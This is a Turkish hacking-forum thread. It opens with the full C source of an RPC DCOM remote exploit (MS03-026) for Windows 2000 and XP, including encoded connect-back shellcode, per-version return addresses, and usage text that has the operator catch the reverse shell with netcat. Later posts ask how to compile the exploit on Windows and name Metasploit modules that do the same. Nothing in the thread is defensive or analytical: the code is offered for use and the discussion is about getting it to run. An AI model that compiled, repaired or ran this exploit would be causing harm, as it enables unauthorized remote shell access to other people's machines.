folder Tahribat.com Forumları
linefolder Bilişim Güvenliği
linefolder Bu Exploit İ Bi Zahmet Derlermisiniz (C)Dilinde



Bu Exploit İ Bi Zahmet Derlermisiniz (C)Dilinde

  1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Mx0TBT
    Mx0TBT's avatar
    Kayıt Tarihi: 13/Haziran/2007
    Erkek
    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>
    #include <errno.h>
    #include <string.h>
    #include <netdb.h>
    #include <sys/types.h>
    #include <netinet/in.h>
    #include <sys/socket.h>

    #define DWORD unsigned long
    #define SOCKET_ERROR -1

    unsigned char bindstr[]={
    0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
    0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
    0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,
    0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
    0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};

    unsigned char request1[]={
    0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03
    ,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00
    ,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45
    ,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E
    ,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D
    ,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41
    ,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00
    ,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45
    ,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00
    ,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29
    ,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00
    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00
    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00
    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00
    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00
    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00
    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00
    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00
    ,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00
    ,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10
    ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF
    ,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10
    ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09
    ,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00
    ,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00
    ,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00
    ,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00
    ,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01
    ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03
    ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00
    ,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E
    ,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00
    ,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00
    ,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00
    ,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00
    ,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00};

    unsigned char request2[]={
    0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00
    ,0x00,0x00,0x5C,0x00,0x5C,0x00};

    unsigned char request3[]={
    0x5C,0x00
    ,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00
    ,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
    ,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
    ,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};



    /* Myam add OFFSETS*/
    char win2knosppl[] = "\x4d\x3f\xe3\x77"; /* polish win2k nosp ver 5.00.2195*/
    char win2ksp3pl[] = "\x29\x2c\xe4\x77"; /* polish win2k sp3 - ver 5.00.2195 tested */
    char win2ksp4sp[] = "\x13\x3b\xa5\x77"; /* spanish win2k sp4 */
    char win2knospeng1[] = "\x74\x16\xe8\x77"; /* english win2k nosp 1 */
    char win2knospeng2[] = "\x6d\x3f\xe3\x77"; /* english win2k nosp 2 */
    char win2ksp1eng[] = "\xec\x29\xe8\x77"; /* english win2k sp1 */
    char win2ksp2eng1[] = "\x2b\x49\xe2\x77"; /* english win2k sp2 1 */
    char win2ksp2eng2[] = "\xb5\x24\xe8\x77"; /* english win2k sp2 2 */
    char win2ksp3eng1[] = "\x7a\x36\xe8\x77"; /* english win2k sp3 1 */
    char win2ksp3eng2[] = "\x5c\xfa\x2e\x77"; /* english win2k sp3 2 */
    char win2ksp4eng[] = "\x9b\x2a\xf9\x77"; /* english win2k sp4 */
    char win2ksp3chi[] = "\x44\x43\x42\x41"; /* china win2k sp3 */
    char win2ksp4chi[] = "\x29\x4c\xdf\x77"; /* china win2k sp4 */
    char win2ksp3ger[] = "\x7a\x88\x2e\x77"; /* german win2k sp3 */
    char win2ksp2jap[] = "\x2b\x49\xdf\x77"; /* japanese win2k sp2 */
    char winxpnospeng[] = "\xe3\xaf\xe9\x77"; /* english xp nosp ver 5.1.2600 */
    char winxpsp1eng1[] = "\xba\x26\xe6\x77"; /* english xp sp1 1 */
    char winxpsp1eng2[] = "\xdb\x37\xd7\x77"; /* english xp sp1 2 */
    char winxpsp2eng[] = "\xbd\x73\x7d\x77"; /* english xp sp2 */





    /* Test this offset
    ( Japanese Windows 2000 Pro SP2 ) : 0x77DF492B
    Windows 2000 (no-service-pack) English 0x77e33f6d
    0x77f92a9b
    0x77e2afc5
    0x772254b0 win2k3
    0x77E829E3 / 0x77E83587 kokanin win2k sp3
    */
    unsigned char sc[]=
    "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00"
    "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00"
    "\x46\x00\x58\x00\x46\x00\x58\x00"


    "\x29\x4c\xdf\x77" //sp4
    //"\x29\x2c\xe2\x77"//0x77e22c29


    "\x38\x6e\x16\x76\x0d\x6e\x16\x76"
    //&#19979;&#38754;&#26159;SHELLCODE&#65292;&#21487;&#20197
    //SHELLCODE&#19981;&#23384;&#22312;0X00&#65292;0X00&#19982;0X5C
    "\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1b\x8d\xa0\x01"
    "\xfc\xff\xff\x83\xe4\xfc\x8b\xec\x33\xc9\x66\xb9\x99\x01\x80\x30"
    "\x93\x40\xe2\xfa"
    // code
    "\x7b\xe4\x93\x93\x93\xd4\xf6\xe7\xc3\xe1\xfc\xf0\xd2\xf7\xf7\xe1"
    "\xf6\xe0\xe0\x93\xdf\xfc\xf2\xf7\xdf\xfa\xf1\xe1\xf2\xe1\xea\xd2"
    "\x93\xd0\xe1\xf6\xf2\xe7\xf6\xc3\xe1\xfc\xf0\xf6\xe0\xe0\xd2\x93"
    "\xd0\xff\xfc\xe0\xf6\xdb\xf2\xfd\xf7\xff\xf6\x93\xd6\xeb\xfa\xe7"
    "\xc7\xfb\xe1\xf6\xf2\xf7\x93\xe4\xe0\xa1\xcc\xa0\xa1\x93\xc4\xc0"
    "\xd2\xc0\xe7\xf2\xe1\xe7\xe6\xe3\x93\xc4\xc0\xd2\xc0\xfc\xf0\xf8"
    "\xf6\xe7\xd2\x93\xf0\xff\xfc\xe0\xf6\xe0\xfc\xf0\xf8\xf6\xe7\x93"
    "\xf0\xfc\xfd\xfd\xf6\xf0\xe7\x93\xf0\xfe\xf7\x93\xc9\xc1\x28\x93"
    "\x93\x63\xe4\x12\xa8\xde\xc9\x03\x93\xe7\x90\xd8\x78\x66\x18\xe0"
    "\xaf\x90\x60\x18\xe5\xeb\x90\x60\x18\xed\xb3\x90\x68\x18\xdd\x87"
    "\xc5\xa0\x53\xc4\xc2\x18\xac\x90\x68\x18\x61\xa0\x5a\x22\x9d\x60"
    "\x35\xca\xcc\xe7\x9b\x10\x54\x97\xd3\x71\x7b\x6c\x72\xcd\x18\xc5"
    "\xb7\x90\x40\x42\x73\x90\x51\xa0\x5a\xf5\x18\x9b\x18\xd5\x8f\x90"
    "\x50\x52\x72\x91\x90\x52\x18\x83\x90\x40\xcd\x18\x6d\xa0\x5a\x22"
    "\x97\x7b\x08\x93\x93\x93\x10\x55\x98\xc1\xc5\x6c\xc4\x63\xc9\x18"
    "\x4b\xa0\x5a\x22\x97\x7b\x14\x93\x93\x93\x10\x55\x9b\xc6\xfb\x92"
    "\x92\x93\x93\x6c\xc4\x63\x16\x53\xe6\xe0\xc3\xc3\xc3\xc3\xd3\xc3"
    "\xd3\xc3\x6c\xc4\x67\x10\x6b\x6c\xe7\xf0\x18\x4b\xf5\x54\xd6\x93"
    "\x91\x93\xf5\x54\xd6\x91\x28\x39\x54\xd6\x97\x4e\x5f\x28\x39\xf9"
    "\x83\xc6\xc0\x6c\xc4\x6f\x16\x53\xe6\xd0\xa0\x5a\x22\x82\xc4\x18"
    "\x6e\x60\x38\xcc\x54\xd6\x93\xd7\x93\x93\x93\x1a\xce\xaf\x1a\xce"
    "\xab\x1a\xce\xd3\x54\xd6\xbf\x92\x92\x93\x93\x1e\xd6\xd7\xc3\xc6"
    "\xc2\xc2\xc2\xd2\xc2\xda\xc2\xc2\xc5\xc2\x6c\xc4\x77\x6c\xe6\xd7"
    "\x6c\xc4\x7b\x6c\xe6\xdb\x6c\xc4\x7b\xc0\x6c\xc4\x6b\xc3\x6c\xc4"
    "\x7f\x19\x95\xd5\x17\x53\xe6\x6a\xc2\xc1\xc5\xc0\x6c\x41\xc9\xca"
    "\x1a\x94\xd4\xd4\xd4\xd4\x71\x7a\x50\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";

    unsigned char request4[]={
    0x01,0x10
    ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00
    ,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C
    ,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    };

    int main(int argc,char ** argv)
    {

    int len, len1, sockfd;
    short port=135;
    struct hostent *he;
    struct sockaddr_in their_addr;


    unsigned char buf1[0x1000];
    unsigned char buf2[0x1000];
    unsigned short port1;


    DWORD cb;



    printf("OC192 RPC DCOM Remote Exploit BSD/Linux Port, thanks LSD and XFORCE\n");


    if(argc<5)
    {

    printf("[<$>] OC192 RPC Remote Windows Exploit\n");
    printf("[<$>] by pHrail and smurfy + some offsets by teos\n");
    printf("[<$>] Thanks to LSD and XForce\n");
    printf("[<$>] Usage: %s <victim> <connectback ip> <cb port> <target>\n",argv[0]);
    printf("[<$>] On connect back nc -lp cbport\n");
    printf("[<$>] Targets: 0 Win2k Polish nosp ver 5.00.2195\n");
    printf("[<$>] 1 Win2k Polish +sp3 ver 5.00.2195\n");
    printf("[<$>] 2 Win2k Spanish +sp4\n");
    printf("[<$>] 3 Win2k English nosp 1\n");
    printf("[<$>] 4 Win2k English nosp 2\n");
    printf("[<$>] 5 Win2k English +sp1\n");
    printf("[<$>] 6 Win2k English +sp2 1\n");
    printf("[<$>] 7 Win2k English +sp2 2\n");
    printf("[<$>] 8 Win2k English +sp3 1\n");
    printf("[<$>] 9 Win2k English +sp3 2\n");
    printf("[<$>] 10 Win2k English +sp4\n");
    printf("[<$>] 11 Win2k China +sp3\n");
    printf("[<$>] 12 Win2k China +sp4\n");
    printf("[<$>] 13 Win2k German +sp3\n");
    printf("[<$>] 14 Win2k Japanese +sp2\n");
    printf("[<$>] 15 WinXP English nosp ver 5.1.2600\n");
    printf("[<$>] 16 WinXP English +sp1 1\n");
    printf("[<$>] 17 WinXP English +sp1 2\n");
    printf("[<$>] 18 WinXP English +sp2\n");
    exit(1);
    }


    if ((he=gethostbyname(argv[1])) == NULL) { // get the host info

    perror("gethostbyname");

    exit(1);

    }

    if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {

    perror("socket");

    exit(1);

    }


    their_addr.sin_family = AF_INET;
    their_addr.sin_port = htons(port);
    their_addr.sin_addr = *((struct in_addr *)he->h_addr);
    memset(&(their_addr.sin_zero), '\0', 8);


    if (connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1) {
    printf("Sorry, cannot connect to %s. Try again...\n", argv[1]);

    exit(1);
    }



    if(atoi(argv[4])==0)
    memcpy(sc+36,win2knosppl,sizeof(win2knosppl));
    else if (atoi(argv[4])==1)
    memcpy(sc+36,win2ksp3pl,sizeof(win2ksp3pl));
    else if (atoi(argv[4])==2)
    memcpy(sc+36,win2ksp4sp,sizeof(win2ksp4sp));
    else if (atoi(argv[4])==3)
    memcpy(sc+36,win2knospeng1,sizeof(win2knospeng1));
    else if (atoi(argv[4])==4)
    memcpy(sc+36,win2knospeng2,sizeof(win2knospeng2));
    else if (atoi(argv[4])==5)
    memcpy(sc+36,win2ksp1eng,sizeof(win2ksp1eng));
    else if (atoi(argv[4])==6)
    memcpy(sc+36,win2ksp2eng1,sizeof(win2ksp2eng1));
    else if (atoi(argv[4])==7)
    memcpy(sc+36,win2ksp2eng2,sizeof(win2ksp2eng2));
    else if (atoi(argv[4])==8)
    memcpy(sc+36,win2ksp3eng1,sizeof(win2ksp3eng1));
    else if (atoi(argv[4])==9)
    memcpy(sc+36,win2ksp3eng2,sizeof(win2ksp3eng2));
    else if (atoi(argv[4])==10)
    memcpy(sc+36,win2ksp4eng,sizeof(win2ksp4eng));
    else if (atoi(argv[4])==11)
    memcpy(sc+36,win2ksp3chi,sizeof(win2ksp3chi));
    else if (atoi(argv[4])==12)
    memcpy(sc+36,win2ksp4chi,sizeof(win2ksp4chi));
    else if (atoi(argv[4])==13)
    memcpy(sc+36,win2ksp3ger,sizeof(win2ksp3ger));
    else if (atoi(argv[4])==14)
    memcpy(sc+36,win2ksp2jap,sizeof(win2ksp2jap));
    else if (atoi(argv[4])==15)
    memcpy(sc+36,winxpnospeng,sizeof(winxpnospeng));
    else if (atoi(argv[4])==16)
    memcpy(sc+36,winxpsp1eng1,sizeof(winxpsp1eng1));
    else if (atoi(argv[4])==17)
    memcpy(sc+36,winxpsp1eng2,sizeof(winxpsp1eng2));
    else if (atoi(argv[4])==18)
    memcpy(sc+36,winxpsp2eng,sizeof(winxpsp2eng));
    port1 = htons(atoi(argv[3]));
    port1 ^= 0x9393;
    cb=inet_addr(argv[2]);
    cb ^= 0x93939393;
    *(unsigned short *)&sc[330+0x30] = port1;
    *(unsigned int *)&sc[335+0x30] = cb;
    len=sizeof(sc);
    memcpy(buf2,request1,sizeof(request1));
    len1=sizeof(request1);

    *(DWORD *)(request2)=*(DWORD *)(request2)+sizeof(sc)/2;
    *(DWORD *)(request2+8)=*(DWORD *)(request2+8)+sizeof(sc)/2;
    memcpy(buf2+len1,request2,sizeof(request2));
    len1=len1+sizeof(request2);
    memcpy(buf2+len1,sc,sizeof(sc));
    len1=len1+sizeof(sc);
    memcpy(buf2+len1,request3,sizeof(request3));
    len1=len1+sizeof(request3);
    memcpy(buf2+len1,request4,sizeof(request4));
    len1=len1+sizeof(request4);
    *(DWORD *)(buf2+8)=*(DWORD *)(buf2+8)+sizeof(sc)-0xc;

    *(DWORD *)(buf2+0x10)=*(DWORD *)(buf2+0x10)+sizeof(sc)-0xc;
    *(DWORD *)(buf2+0x80)=*(DWORD *)(buf2+0x80)+sizeof(sc)-0xc;
    *(DWORD *)(buf2+0x84)=*(DWORD *)(buf2+0x84)+sizeof(sc)-0xc;
    *(DWORD *)(buf2+0xb4)=*(DWORD *)(buf2+0xb4)+sizeof(sc)-0xc;
    *(DWORD *)(buf2+0xb8)=*(DWORD *)(buf2+0xb8)+sizeof(sc)-0xc;
    *(DWORD *)(buf2+0xd0)=*(DWORD *)(buf2+0xd0)+sizeof(sc)-0xc;
    *(DWORD *)(buf2+0x18c)=*(DWORD *)(buf2+0x18c)+sizeof(sc)-0xc;



    if(send(sockfd, bindstr, sizeof(bindstr), 0)== -1){
    printf("Send failed pussy.\n");
    exit(1);
    }

    len=recv(sockfd,buf1,1000,NULL);
    if (send(sockfd,buf2,len1,0)==SOCKET_ERROR) {

    printf("Send failed pussy\n");
    return;
    }
    len=recv(sockfd,buf1,1024,NULL);

    }
     
    adresi  http://milw0rm.org/exploits/69
    bi tür lü derleyemedim windows da  

    Ölümlü dünya. Yasin 38. Ayet
  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    RhiFaT
    RhiFaT's avatar
    Kayıt Tarihi: 11/Mart/2004
    Erkek

    bunu sanırım sadece cgwin programı ile derleyebilirsin ama o da sorunlu olur zira kütüphane dosyaları sorunlu olabilir.

    en iyisi linuxta derle mesela cd den çalışan bi linux cdsi ile dene

     


    işte öyle
  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Mx0TBT
    Mx0TBT's avatar
    Kayıt Tarihi: 13/Haziran/2007
    Erkek
    bende suan lınux yok backtrack vardı yanlıslık la sılındı windows da denedim hata verdi linux kullanan murid vardır illakı bi yardım

    Ölümlü dünya. Yasin 38. Ayet
  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    tLG
    tLG's avatar
    Kayıt Tarihi: 08/Aralık/2008
    Erkek
    bendeki visual c++ 6.0 ile denedim 1 adet hata olduğundan dolayı derlemiyor.

    "Geri geri çıkarken, biiip biiip sesi çıkaran araçların seslerini zil sesi yapmayı sevenlerin buluşma noktası" diye bi grup açsam katılır mısın lan feysbuk"ta?
  5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Yeah
    Yeah's avatar
    Kayıt Tarihi: 02/Ekim/2007
    Erkek
    ne işe yarıyor ki bu :W

    herşeyin kısası makbuldur; ulaşmak isteyen yesterfox_55@hotmail.com a mail atabilir...
  6. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Mx0TBT
    Mx0TBT's avatar
    Kayıt Tarihi: 13/Haziran/2007
    Erkek

    tLG bunu yazdı:
    -----------------------------
    bendeki visual c++ 6.0 ile denedim 1 adet hata olduğundan dolayı derlemiyor.
    -----------------------------

    bende windows dev c ile derlemeye calıstım  1 adet hata aldıM napcaz bunu yaw derlemem lazım


    Ölümlü dünya. Yasin 38. Ayet
  7. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Yeah
    Yeah's avatar
    Kayıt Tarihi: 02/Ekim/2007
    Erkek

    linux um vardı ama şevkim kaçtı, derlemicem :W

     

    edit: yeah.c:340: UYARI: passing argument 4 of 'recv' makes integer from pointer without a cast 

    ne diyor lan bu, zerre anlamam bu işlerden neyse madem, geri adım attım ben :W


    herşeyin kısası makbuldur; ulaşmak isteyen yesterfox_55@hotmail.com a mail atabilir...
  8. KısayolKısayol reportŞikayet pmÖzel Mesaj
    cnr437
    cnr437's avatar
    Banlanmış Üye
    Kayıt Tarihi: 03/Nisan/2007
    Erkek

    cnm bu metasploitin içinde zaten hazır var,

    rpc dcom bu

     windows/dcerpc/ms03_026_dcom

    yada bunlar,

     windows/dcerpc/ms05_017_msmq

     windows/dcerpc/ms07_065_msmq

     


    Bizim olduğumuz her yerde herşey bizim yüzümüzden olmuştur. Ben benim amk bana bişey olmasın!
  9. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Emrow
    Emrow's avatar
    Banlanmış Üye
    Kayıt Tarihi: 17/Mart/2007
    Erkek
    devlen derleyn..kütüp eksikse indiriğğnn..
  10. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Mx0TBT
    Mx0TBT's avatar
    Kayıt Tarihi: 13/Haziran/2007
    Erkek

    hacı senın bu verdıklerın sp 0  ve altı ıcın benım bu exploit ise sp2 için

    bide kütüphaneyi nasıl indircez nasıl yüklücez


    Ölümlü dünya. Yasin 38. Ayet
  11. KısayolKısayol reportŞikayet pmÖzel Mesaj
    cnr437
    cnr437's avatar
    Banlanmış Üye
    Kayıt Tarihi: 03/Nisan/2007
    Erkek

    hem linuxta derlesen de exe olmucak

    linux için derlencek

    o yüzden windowsta library'leri tamamla ondan sonra derle


    Bizim olduğumuz her yerde herşey bizim yüzümüzden olmuştur. Ben benim amk bana bişey olmasın!
Toplam Hit: 14067 Toplam Mesaj: 18